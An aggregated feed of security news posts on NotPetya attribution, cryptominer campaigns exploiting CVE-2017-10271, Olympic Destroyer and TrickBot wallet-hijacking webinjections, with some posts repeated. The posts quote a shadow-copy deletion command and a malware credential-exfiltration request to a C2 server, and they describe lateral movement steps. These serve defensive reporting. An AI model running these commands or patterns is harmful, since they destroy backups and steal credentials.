The UK government has officially attributed the June 2017 NotPetya cyber attack to the Russian government. The statement is backed by an assessment of the UK’s National Cyber Security Centre, which has found that the Russian military was “almost certainly” responsible for it. The NotPetya attack “The NotPetya attack saw a malicious data encryption tool inserted into a legitimate a piece of software used by most of Ukraine’s financial and government institutions,” the NCSC noted. … More

UK Foreign Office Minister blames Russia for NotPetya massive ransomware attack

The United Kingdon’s Foreign and Commonwealth Office formally accuses the Russian cyber army of launching the massive NotPetya ransomware attack.

The UK Government formally accuses the Russian cyber army of launching the massive NotPetya ransomware attack.

The United Kingdon’s Foreign and Commonwealth Office “attributed the NotPetya cyber-attack to the Russian Government.”

According to the UK, NotPetya was used to disrupt Ukrainian “financial, energy and government sector” targets, but it went out of control causing severe damages to companies worldwide.

notpetya

The shipping giant Maersk chair Jim Hagemann Snabe revealed its company reinstalled 45,000 PCs and 4,000 Servers after NotPetya the attack.

In August 2017 the company announced that it would incur hundreds of millions in U.S. dollar losses due to the ransomware massive attack.

The UK considers the attack an intolerable act and will not accept future similar offensives.

“Foreign Office Minister Lord Ahmad has today attributed the NotPetya cyber-attack to the Russian Government. The decision to publicly attribute this incident underlines the fact that the UK and its allies will not tolerate malicious cyber activity.” reads the official statement issued by the UK Government.

“The attack masqueraded as a criminal enterprise but its purpose was principally to disrupt. Primary targets were Ukrainian financial, energy and government sectors. Its indiscriminate design caused it to spread further, affecting other European and Russian business.”

Below the declaration of the Foreign Office Minister for Cyber Security Lord (Tariq) Ahmad of Wimbledon:

“The UK Government judges that the Russian Government, specifically the Russian military, was responsible for the destructive NotPetya cyber-attack of June 2017.

The attack showed a continued disregard for Ukrainian sovereignty. Its reckless release disrupted organisations across Europe costing hundreds of millions of pounds.

The Kremlin has positioned Russia in direct opposition to the West yet it doesn’t have to be that way. We call upon Russia to be the responsible member of the international community it claims to be rather then secretly trying to undermine it.

The United Kingdom is identifying, pursuing and responding to malicious cyber activity regardless of where it originates, imposing costs on those who would seek to do us harm. We are committed to strengthening coordinated international efforts to uphold a free, open, peaceful and secure cyberspace.”

According to Ukraine’s Secret Service (SBY), Russia orchestrated the NotPetya ransomware attack, going public with their accusations just days after the incident.

NotPetya wasn’t the last massive ransomware attack in order of time, in October Bad Rabbit

NotPetya was followed by the Bad Rabbit ransomware that in late October infected systems in many countries wordlwide, most of in East Europe, such as Ukraine and Russia.

Pierluigi Paganini

(Security Affairs – NotPetya, ransomware)

The post UK Foreign Office Minister blames Russia for NotPetya massive ransomware attack appeared first on Security Affairs.

Security Affairs: UK Foreign Office Minister blames Russia for NotPetya massive ransomware attack

The United Kingdon’s Foreign and Commonwealth Office formally accuses the Russian cyber army of launching the massive NotPetya ransomware attack.

The UK Government formally accuses the Russian cyber army of launching the massive NotPetya ransomware attack.

The United Kingdon’s Foreign and Commonwealth Office “attributed the NotPetya cyber-attack to the Russian Government.”

According to the UK, NotPetya was used to disrupt Ukrainian “financial, energy and government sector” targets, but it went out of control causing severe damages to companies worldwide.

notpetya

The shipping giant Maersk chair Jim Hagemann Snabe revealed its company reinstalled 45,000 PCs and 4,000 Servers after NotPetya the attack.

In August 2017 the company announced that it would incur hundreds of millions in U.S. dollar losses due to the ransomware massive attack.

The UK considers the attack an intolerable act and will not accept future similar offensives.

“Foreign Office Minister Lord Ahmad has today attributed the NotPetya cyber-attack to the Russian Government. The decision to publicly attribute this incident underlines the fact that the UK and its allies will not tolerate malicious cyber activity.” reads the official statement issued by the UK Government.

“The attack masqueraded as a criminal enterprise but its purpose was principally to disrupt. Primary targets were Ukrainian financial, energy and government sectors. Its indiscriminate design caused it to spread further, affecting other European and Russian business.”

Below the declaration of the Foreign Office Minister for Cyber Security Lord (Tariq) Ahmad of Wimbledon:

“The UK Government judges that the Russian Government, specifically the Russian military, was responsible for the destructive NotPetya cyber-attack of June 2017.

The attack showed a continued disregard for Ukrainian sovereignty. Its reckless release disrupted organisations across Europe costing hundreds of millions of pounds.

The Kremlin has positioned Russia in direct opposition to the West yet it doesn’t have to be that way. We call upon Russia to be the responsible member of the international community it claims to be rather then secretly trying to undermine it.

The United Kingdom is identifying, pursuing and responding to malicious cyber activity regardless of where it originates, imposing costs on those who would seek to do us harm. We are committed to strengthening coordinated international efforts to uphold a free, open, peaceful and secure cyberspace.”

According to Ukraine’s Secret Service (SBY), Russia orchestrated the NotPetya ransomware attack, going public with their accusations just days after the incident.

NotPetya wasn’t the last massive ransomware attack in order of time, in October Bad Rabbit

NotPetya was followed by the Bad Rabbit ransomware that in late October infected systems in many countries wordlwide, most of in East Europe, such as Ukraine and Russia.

Pierluigi Paganini

(Security Affairs – NotPetya, ransomware)

The post UK Foreign Office Minister blames Russia for NotPetya massive ransomware attack appeared first on Security Affairs.



Security Affairs

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining

Introduction

FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.

We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.

The recent cryptocurrency boom has resulted in a growing number of operations – employing diverse tactics – aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1), and executing it using ShellExecute().


Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).


Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

  • Downloading miners from remote servers


Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.

  • Creating scheduled tasks for persistence


Figure 4: Creation of scheduled task

  • Deleting scheduled tasks of other known cryptominers


Figure 5: Deletion of scheduled tasks related to other miners

In Figure 4, the cryptominer creates a scheduled task with name “Update service for Oracle products1”.  In Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for Oracle productsa”.  

From this, it’s quite clear that different attackers are fighting over the resources available in the system.

  • Killing processes matching certain strings associated with other cryptominers


Figure 6: Terminating processes directly


Figure 7: Terminating processes matching certain strings

Similar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).

  • Connects to mining pools with wallet key


Figure 8: Connection to mining pools

The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.

  • Limiting CPU usage to avoid suspicion


Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).

Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim’s environment using dumped Windows credentials and the EternalBlue vulnerability (CVE-2017-0144).

The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.

If the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and uses it to spread to that host.

After all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.

Tactic #4: Scenarios observed in Linux OS

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.


Figure 10: Delivery of shell scripts

The shell script performs the following activities:

  • Attempts to kill already running cryptominers


Figure 11: Terminating processes matching certain strings

  • Downloads and executes cryptominer malware


Figure 12: Downloading CryptoMiner

  • Creates a cron job to maintain persistence


Figure 13: Cron job for persistence

  • Tries to kill other potential miners to hog the CPU usage


Figure 14: Terminating other potential miners

The function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.

Conclusion

Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We’ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name

POWERSHELL DOWNLOADER (METHODOLOGY)

MONERO MINER (METHODOLOGY)

MIMIKATZ (CREDENTIAL STEALER)

Indicators of Compromise

MD5

Name

3421A769308D39D4E9C7E8CAECAF7FC4

cranberry.exe/logic.exe

B3A831BFA590274902C77B6C7D4C31AE

xmrig.exe/yam.exe

26404FEDE71F3F713175A3A3CEBC619B

1.ps1

D3D10FAA69A10AC754E3B7DDE9178C22

2.ps1

9C91B5CF6ECED54ABB82D1050C5893F2

info3.ps1

3AAD3FABF29F9DF65DCBD0F308FF0FA8

info6.ps1

933633F2ACFC5909C83F5C73B6FC97CC

lower.css

B47DAF937897043745DF81F32B9D7565

lib.css

3542AC729035C0F3DB186DDF2178B6A0

bootstrap.css

Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

IoT botnet bypasses firewalls to get to ZyXEL modems

NewSky Security’s honeypots have detected a new IoT botnet in the making. The botnet was named DoubleDoor, as it leverages two distinct backdoors to get to the target: ZyXEL PK5001Z modems. The DoubleDoor attacks What’s interesting about this particular botnet is that it’s ready to pass an extra layer of security to get to the modem: Juniper Networks’ NetScreen hardware firewall devices. To pull off the attack, it employs exploits for two vulnerabilities: CVE-2015–7755, which … More

Smashing Security #065: Cryptominomania, Poppy, and your Amazon Alexa

Smashing Security #065: Cryptominomania, Poppy, and your Amazon Alexa

Cryptomining goes nuclear, YouTube for Kids gets scary, and TV ads have been given the green light to mess with your Amazon Alexa.

All this and much much more is discussed in the latest edition of the "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, who are joined this week by special guest Maria Varmazis.

McAfee Blogs: Warning: Crypto-Currency Mining is Targeting Your Android

Cryptocurrency, a virtual form of currency designed to work as a secure form of exchange, has gained a lot of traction in the world of finance and technology. But for many, the concept of obtaining cryptocurrency, or “crypto mining,” is obscure. Investopedia defines crypto-mining as, “the process by which transactions are verified and added to the public ledger, known as the blockchain, and also the means through which new currencies such as Bitcoin and Ethereum are released.”

The practice has been around since 2009, and anyone with access to the Internet, the required programs and hardware can participate in mining. In fact, by the end of this month, Forbes Magazine will have published its first “Top Richest” list dedicated to Crypto Millionaires.

With the rise in popularity of digital currency, it’s no surprise that cybercriminals across the globe are leveraging malicious code to obtain it. Hackers would rather develop or utilize mining malware instead of paying the expensive price tag associated with mining machines, which can be upwards of $5000. In China, the ADB Miner malware is spreading and targeting thousands of Android devices for the primary purpose of mining cryptocurrency. The malware is spread through the publicly accessible Android Debug Bridge (abd) on an opened port 5555. This port is typically closed but can be opened by an ADB debug tool. Once infected, a device will look for other devices with the same vulnerability to spread the malware and leverage other Android-based smartphones, tablets, and televisions for crypto-mining.

So why are cybercriminals now targeting Android mobile devices? This could be due to the fact that hackers know they can easily manipulate vulnerabilities in Google Play’s app vetting system. Last year McAfee Mobile Threat Research identified more than 4,000 apps that were removed from Google Play without notification to users. Currently, the app store does not have consistent or centralized reporting available for app purchasers. Even if an app is supported by Google Play at the time of download, it could later be identified as malicious and Android users may be unaware of the fact that they’re harboring a bad app.

Researchers have found over 600 blacklisted malicious cryptocurrency apps across 20 app stores including Apple and Google Play. Google Play was found to have the highest amount of malicious crypto apps, with 272 available for download. In the United States, researchers have found another crypto-mining malware that is so demanding of phone processors, its causing them to implode. Loapi, a newly-discovered Trojan crypto-miner, can cause phone batteries to swell up and burst open the device’s back cover, and has been found in up to 20 mobile apps.

Crypto-mining malware isn’t a new phenomenon. Before the WannaCry attacks last summer, cryptocurrency malware sprung up as another malicious software looking to take advantage of the same Windows vulnerabilities that WannaCry exploited. But, instead of locking down systems with ransomware, these cybercriminals were putting them to work, using a cryptocurrency mining malware called Adylkuzz.

Here are a few tips to ensure your Android-devices are protected from crypto-mining malware:

  • Download your apps from a legitimate source. While some malicious apps may slip through the cracks, app stores like Google Play do have security measures in place to protect users, and it’s much safer than downloading from an unknown source.
  • Delete any apps that you haven’t used over the past 6-months. An app’s security can change over time; applications that were once supported by an app store can be flagged as malicious and removed from the platform without notification. If an app is no longer supported in the app store, you should delete it immediately.
  • Keep all of your software up to date. Many of the more harmful malware attacks we’ve seen, like the Equifax data breach, take advantage of software vulnerabilities in common applications, such as operating systems and browsers. Having the latest software and application versions ensures that any known bugs or exploits are patched, and is one of the best defenses against viruses and malware.
  • Double up on your mobile security software. I can’t stress enough how important is to use comprehensive security software to protect your personal devices.

Interested in learning more about IoT and mobile security tips and trends? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

 

The post Warning: Crypto-Currency Mining is Targeting Your Android appeared first on McAfee Blogs.



McAfee Blogs

Warning: Crypto-Currency Mining is Targeting Your Android

Cryptocurrency, a virtual form of currency designed to work as a secure form of exchange, has gained a lot of traction in the world of finance and technology. But for many, the concept of obtaining cryptocurrency, or “crypto mining,” is obscure. Investopedia defines crypto-mining as, “the process by which transactions are verified and added to the public ledger, known as the blockchain, and also the means through which new currencies such as Bitcoin and Ethereum are released.”

The practice has been around since 2009, and anyone with access to the Internet, the required programs and hardware can participate in mining. In fact, by the end of this month, Forbes Magazine will have published its first “Top Richest” list dedicated to Crypto Millionaires.

With the rise in popularity of digital currency, it’s no surprise that cybercriminals across the globe are leveraging malicious code to obtain it. Hackers would rather develop or utilize mining malware instead of paying the expensive price tag associated with mining machines, which can be upwards of $5000. In China, the ADB Miner malware is spreading and targeting thousands of Android devices for the primary purpose of mining cryptocurrency. The malware is spread through the publicly accessible Android Debug Bridge (abd) on an opened port 5555. This port is typically closed but can be opened by an ADB debug tool. Once infected, a device will look for other devices with the same vulnerability to spread the malware and leverage other Android-based smartphones, tablets, and televisions for crypto-mining.

So why are cybercriminals now targeting Android mobile devices? This could be due to the fact that hackers know they can easily manipulate vulnerabilities in Google Play’s app vetting system. Last year McAfee Mobile Threat Research identified more than 4,000 apps that were removed from Google Play without notification to users. Currently, the app store does not have consistent or centralized reporting available for app purchasers. Even if an app is supported by Google Play at the time of download, it could later be identified as malicious and Android users may be unaware of the fact that they’re harboring a bad app.

Researchers have found over 600 blacklisted malicious cryptocurrency apps across 20 app stores including Apple and Google Play. Google Play was found to have the highest amount of malicious crypto apps, with 272 available for download. In the United States, researchers have found another crypto-mining malware that is so demanding of phone processors, its causing them to implode. Loapi, a newly-discovered Trojan crypto-miner, can cause phone batteries to swell up and burst open the device’s back cover, and has been found in up to 20 mobile apps.

Crypto-mining malware isn’t a new phenomenon. Before the WannaCry attacks last summer, cryptocurrency malware sprung up as another malicious software looking to take advantage of the same Windows vulnerabilities that WannaCry exploited. But, instead of locking down systems with ransomware, these cybercriminals were putting them to work, using a cryptocurrency mining malware called Adylkuzz.

Here are a few tips to ensure your Android-devices are protected from crypto-mining malware:

  • Download your apps from a legitimate source. While some malicious apps may slip through the cracks, app stores like Google Play do have security measures in place to protect users, and it’s much safer than downloading from an unknown source.
  • Delete any apps that you haven’t used over the past 6-months. An app’s security can change over time; applications that were once supported by an app store can be flagged as malicious and removed from the platform without notification. If an app is no longer supported in the app store, you should delete it immediately.
  • Keep all of your software up to date. Many of the more harmful malware attacks we’ve seen, like the Equifax data breach, take advantage of software vulnerabilities in common applications, such as operating systems and browsers. Having the latest software and application versions ensures that any known bugs or exploits are patched, and is one of the best defenses against viruses and malware.
  • Double up on your mobile security software. I can’t stress enough how important is to use comprehensive security software to protect your personal devices.

Interested in learning more about IoT and mobile security tips and trends? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

 

The post Warning: Crypto-Currency Mining is Targeting Your Android appeared first on McAfee Blogs.

Cyber Sabotage at the Winter Olympics

On Monday, while spectators were being dazzled by the opening ceremony of the 2018 Winter Olympics, held in Pyeongchang, the Olympics organizing committee was busy dealing with a cyberattack.

The decline in new malware samples and the professionalization of attacks on networks are setting new standards in cybersecurity. In this case, we’re dealing with a targeted attack and an act of sabotage, in which hackers sought to cause chaos during the opening ceremony. It affected some television and internet services before the ceremony, but was not successful in stealing data from servers.

Researchers from Cisco’s Talos division also added that the malware’s purpose was not theft, but rather destruction.

GoldDragoN, the latest Russian hack?

With the focus usually centered on maximum profit, there’s been an increase in the number of advanced infiltrations using sharp new tactics, such as malwareless attacks and the abuse of non-malicious tools.

PandaLabs explains that by not using malware, which is easily detected by advanced cybersecurity tools, attackers assume the identity of the administrator after having obtained  their network credentials. They warn that the techniques used by cybercriminals to attack without using malware can be highly varied, taking advantage of all kinds of non-malicious tools that are part of the day to day of IT managers.

In this case, the attack did in fact use malware (named GoldDragon), but to carry out certain actions it used non-malicious tools such as PsExec or the CMD itself. In this way, it was able to execute processes on other computers connected to the network without raising suspicion and without using a version modified by the attackers, but rather the official version.

To carry out its destructive actions, it launched system commands from a command window (cmd). Instructions looked like this:

C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet

Here, the vssadmin.exe is used to silently erase the backup copies created by the operating system.

Everything seems to indicate that the attack came from Russia. Ukrainian intelligence and a CIA report linked NotPetya and BadRabbit to Russian intelligence, and in the case of GoldDragon (also called Olympic Destroyer), all signs point to a more refined version of BadRabbit.

System tools as a new attack vector

Monitoring the execution of all processes on company workstations and servers is essential to avoiding close calls like the one we witnessed in this year’s winter olympics.

Traditional antiviruses are not able to detect these types of attack, nor to remediate them. However, Panda Adaptive Defense proposes a new security model based on the monitoring, control, and classification of behavior and the nature application in execution to offer robust and complete protection.

PandaLabs recommends the use of advanced cybersecurity solutions such as Panda Adaptive Defense, which also allow the client’s existing infrastructure to coexist with traditional antivirus systems and integrate with existing SIEM solutions.

The post Cyber Sabotage at the Winter Olympics appeared first on Panda Security Mediacenter.

Cryptomining malware continues to drain enterprise CPU power

Cryptomining malware continues to impact organizations globally as 23% were affected by the Coinhive variant during January 2018, according to Check Point’s latest Global Threat Impact Index. Researchers discovered three different variants of cryptomining malware in its Top 10 most prevalent ranking, with Coinhive ranking first, impacting more than one-in-five organizations. Coinhive performs online mining of Monero cryptocurrency when a user visits a web page without the user’s approval. The implanted JavaScript then uses the … More

UK Government Publicly Attributes NotPetya Outbreak to Russia

UK government officials have publicly attributed the NotPetya malware attacks of June 2017 to actors in the Russian government. Foreign Office Minister Lord Ahmad made his thoughts known in a statement released on 15 February: The UK Government judges that the Russian Government, specifically the Russian military, was responsible for the destructive NotPetya cyber-attack of […]… Read More

The post UK Government Publicly Attributes NotPetya Outbreak to Russia appeared first on The State of Security.

TrickBot’s Cryptocurrency Hunger: Tricking the Bitcoin Out of Wallets

The TrickBot Trojan has been a rising global threat in the cybercrime arena ever since its emergence in late 2016. The organized cybergang that operates TrickBot has been widening its scope of activity to dozens of countries across the globe. It has been targeting financial entities, such as banks and credit providers, and focusing on business and private banking as it aims for hefty fraudulent transfer bounties.

But this is not where TrickBot’s diverse interests stop. As the value and popularity of cryptocurrency continues to rapidly rise, so does this cybergang’s interest in obtaining cryptocoins in the easiest way possible: theft. TrickBot configurations have featured popular cryptocurrency exchange URLs since about mid-2017, and we at IBM X-Force have been looking at the malware’s most recent attack schemes to steal coins from infected users.

There are several types of cryptocurrency platforms, each offering a variety of services, such as trading one coin for another, transferring coins between different wallets and buying coins with a credit card. According to our analysis, TrickBot is actively targeting one such service that enables users to purchase bitcoin and bitcoin cash by credit card.

The attacks we have looked into are facilitated by TrickBot’s webinjections, getting in the middle of the flow of a legitimate payment card transaction. In the normal payment scenario, a user looking to buy coins provides his or her public bitcoin wallet address and specifies the amount of bitcoin to purchase. When submitting this initial form, the user is redirected from the bitcoin exchange platform to a payment gateway on another domain, which is operated by a payment service provider. There, the user fills in his or her personal information, as well as credit card and billing details, and confirms the purchase of coins.

This is where TrickBot hijacks the coins. This particular attack targets both the bitcoin exchange website and that of the payment service to grab the coins and route them to an attacker-controlled wallet.

Watch the on-demand webinar: The Evolution of TrickBot Into the Next Global Banking Threat

Webinjection Basics

The inner workings of TrickBot’s cryptocoin attack rely on an existing TrickBot attack tactic: webinjections. This age-old favorite tool of many banking Trojans is a form of man-in-the-browser attack that enables malware to modify webpages presented to the user. Malware authors achieve this by placing hooks on key application programming interface (API) functions inside the browser. These hooks intercept information going from and back to the browser and alter it midway.

The code that dictates which webpages should be attacked is usually not part of the malware’s executable code. Rather, it is in a configuration stored separately in the form of rules, each one defining which URL is to be modified and how. These rules usually contain large sections of malicious JavaScript code that is responsible for visually modifying the page, sending sensitive user information to the fraudulent server, etc.

Unlike most financial malware, TrickBot does not expose the injected code in the configuration itself. Instead, a web URL of a remote command-and-control (C&C) server corresponds with every targeted URL. This modus operandi is called serverside webinjection and has been used by TrickBot since its launch in 2016. Serverside webinjections allow TrickBot to modify the injected code on its server in real time without having to update the configuration on the infected machine.

The Target: Bitcoin

To see the attack rules TrickBot has in store for any targeted site, we must first access the configuration. TrickBot keeps its configuration encrypted on the infected machine. To read it and unveil the list of targeted entities, one can either decrypt the configuration file or inspect it in the browser’s memory after the malware has already decrypted it.

The relevant part of TrickBot’s configuration for this attack shows that the scheme involves two webpages that, together, make up the coin purchase process. The first is a page where the user provides his or her bitcoin wallet address and the desired amount of bitcoin to purchase. The second is a page where the payment process is executed.

In the image below, we can see the exact set of rules in TrickBot’s configuration, each one matching a targeted page with a URL on TrickBot’s server. This way, TrickBot fetches the appropriate webinjection to alter the legitimate transaction and do its bidding instead.

IBM X-Force Research

Figure 1: Attack rules in TrickBot’s configuration (source: X-Force Research)

To enable it to control the infected machine’s web browser, TrickBot’s modules are injected into the browser ahead of time and already have hooks in place to launch webinjections.

IBM X-Force Research

Figure 2: TrickBot dynamic link libraries (DLLs) loaded into the browser

IBM X-Force Research

Figure 3: PR_Read and PR_Write functions with TrickBot’s hooks in place

To view what was happening during the web session, we sniffed HTTP network traffic on the infected machine when opening the targeted URL. This revealed the attack flow of the malware’s dynamic injection method, which TrickBot refers to as “dinj.”

For every resource that TrickBot wishes to replace — an HTML page, a JavaScript or a CSS file — an HTTP POST request is sent to the C&C server with the following attributes of that resource:

  1. “sourcelink,” the complete URL of the resource to be replaced;
  2. “sourcequery,” the browser’s HTTP request for the resource (including all headers); and
  3. “sourcehtml,” the original code as would be returned by the legitimate host.

Injection No. 1: Gathering Victim Data

One of the resources TrickBot replaced is the HTML code of the bitcoin website. The code is being switched up to gather data on the victim’s cryptocoin wallet and the number of coins to be purchased.

Using Wireshark, we can see that the page is sent to TrickBot’s C&C and that a the attack server returned a modified version.

IBM X-Force Research

Figure 4: HTTP Packets capture from the targeted site sent to C&C

IBM X-Force Research

Figure 5: The injection request for the HTML page of the targeted site

To point out the injected script, we performed a simple diff between the original page source and the one returned by TrickBot’s C&C.

IBM X-Force Research

Figure 6: Diff between original HTML page and one returned by TrickBot

Flow of Events

The script first fetches an HTML element with ID “btcAddress.” This element is an input field in which the user fills in his or her wallet address. If this element is found on the page, the malware performs the following actions to alter the interaction with the targeted webpage:

  1. Any existing logic attached to the enter key (key code 13) is eliminated, probably to limit the form submission via keyboard and make sure the victim has to click a TrickBot-generated submit button.
  2. The original submit button is cloned, the new copy is placed in the HTML document object model (DOM) and the original button is hidden from the victim.
  3. A fraudulent form-submission process is registered to the new submit button with an event listener. Upon clicking, the wallet address and the desired amount of bitcoin entered by the user are fetched and sent to the malware server using an AJAX request.

IBM X-Force Research

Figure 7: Part of the injected code TrickBot used to hijack cryptocoin purchase transactions (code comments added by X-Force research)

The injection into the HTML page is used only to collect information. The attacker can use this information — the legitimate user’s bitcoin wallet address and the bitcoin amount to purchase — to decide whether to proceed with a fraudulent operation.

Later on, after being redirected to the payment process, TrickBot will gather more information. This is probably done to allow a future account takeover attack, which will enable the fraudsters to perform a purchase/coin transfer from a machine they control using the legitimate user’s wallet credentials and payment card details.

Injection No. 2: Stealing the Coins

The second phase of the TrickBot attack facilitates the theft of the cryptocoins by preying on the web logic defined by the payment provider for legitimate online transactions.

The actual bitcoin theft is once again facilitated by a webinjection that modifies another resource of the site, “bundle.js,” which contains most of the payment processing logic.

IBM X-Force Research

Figure 8: bundle.js is loaded by the original HTML page

IBM X-Force Research

Figure 9: The dynamic injection request to bundle.js

By checking the diff between the original version of bundle.js and the modified one, we noticed that the function sendPaymentRequest had been changed. This function is responsible for sending payment requests to the payment service provider, and it has been modified to contain a hardcoded bitcoin address instead of the one inserted by the user.

IBM X-Force Research

Figure 10: sendPaymentRequest before and after modification by TrickBot

The “walletaddress” attribute is the address of the bitcoin wallet to which the purchased coins will be delivered after the deal is complete. This injection ensures that the bitcoin will not be delivered to the original address provided by the victim, but to an address belonging to TrickBot’s operators.

From this point on, the victim is led through several steps of identification in which he or she provides a phone number, an email address, a selfie photo with the credit card he or she wants to use, and a photo of his or her national ID card.

However, these steps only serve to verify the personal identity and not the ownership of the wallet address. By now, the wallet address has already been set and will not be shown to the victim again. Thus, the victim’s credit card will be charged and he or she will believe the deal was successful, expecting to see the new coins in his or her wallet. The bitcoin will never reach the designated wallet, however, but will instead be delivered to a wallet belonging to one of TrickBot’s operators.

More to Come?

Having researched the attack tactics TrickBot applied to this cryptocurrency coin theft, we can see that, while it relies on existing mechanisms, the scheme required extensive research of the targeted sites, their web logic and the security controls they use. It highlights what we already know about this malware gang: It continues to study new targets and expand its reach.

As the theft of cryptocurrency becomes increasingly popular among financial malware operators, we expect to see a many more campaigns targeting platforms and service providers in the cryptocurrency sector.

To mitigate the risk of financial malware, organizations can leverage the adaptive controls provided by IBM Trusteer’s Pinpoint Detect.

Indicators of Compromise

In this study, we used a TrickBot sample with MD5 039bc78ca0801006cc33485bc94f415c.

Watch the on-demand webinar: The Evolution of TrickBot Into the Next Global Banking Threat

The post TrickBot’s Cryptocurrency Hunger: Tricking the Bitcoin Out of Wallets appeared first on Security Intelligence.

Financial Services Sector Breaches Triple in Five Years

Financial services firms are targeted more than any other sector, with breaches tripling over the past five years, according to the latest report from Accenture.The consultancy conducted over 2100 interviews

The post Financial Services Sector Breaches Triple in Five Years appeared first on The Cyber Security Place.

Cyber security leaders concerned about sharp rise in digital threats

The lack of internal resources and exploding cybercrime is creating a ‘perfect storm’ for CISOs and their teams RiskIQ, the digital threat management firm, has announced the release of its

The post Cyber security leaders concerned about sharp rise in digital threats appeared first on The Cyber Security Place.

How cybercriminals exploited Telegram flaw to deliver malware

A “vulnerability” in Telegram’s desktop instant messaging client for Windows was exploited for months by Russian cybercriminals to deliver malware to users. Kaspersky Lab researchers discovered in October 2017 that the flaw – which is actually more of a loophole, really – was being actively exploited. They notified Telegram about the issue, and sometime between then and now the loophole was closed by the developers. “We don’t have exact information about how long and which … More

How artificial intelligence stopped an Emotet outbreak

At 12:46 a.m. local time on February 3, a Windows 7 Pro customer in North Carolina became the first would-be victim of a new malware attack campaign for Trojan:Win32/Emotet. In the next 30 minutes, the campaign tried to attack over a thousand potential victims, all of whom were instantly and automatically protected by Windows Defender AV.

How did Windows Defender AV uncover the newly launched attack and block it at the outset? Through layered machine learning, including use of both client-side and cloud machine learning (ML) models. Every day, artificial intelligence enables Windows Defender AV to stop countless malware outbreaks in their tracks. In this blog post, well take a detailed look at how the combination of client and cloud ML models detects new outbreaks.

Figure 1. Layered detected model in Windows Defender AV

Client machine learning models

The first layer of machine learning protection is an array of lightweight ML models built right into the Windows Defender AV client that runs locally on your computer. Many of these models are specialized for file types commonly abused by malware authors, including, JavaScript, Visual Basic Script, and Office macro. Some models target behavior detection, while other models are aimed at detecting portable executable (PE) files (.exe and .dll).

In the case of the Emotet outbreak on February 3, Windows Defender AV caught the attack using one of the PE gradient boosted tree ensemble models. This model classifies files based on a featurization of the assembly opcode sequence as the file is emulated, allowing the model to look at the files behavior as it was simulated to run.

Figure 2. A client ML model classified the Emotet outbreak as malicious based on emulated execution opcode machine learning model.

The tree ensemble was trained using LightGBM, a Microsoft open-source framework used for high-performance gradient boosting.

Figure 3a. Visualization of the LightBGM-trained client ML model that successfully classified Emotet’s emulation behavior as malicious. A set of 20 decision trees are combined in this model to classify whether the files emulated behavior sequence is malicious or not.

Figure 3b. A more detailed look at the first decision tree in the model. Each decision is based on the value of a different feature. Green triangles indicate weighted-clean decision result; red triangles indicate weighted malware decision result for the tree.

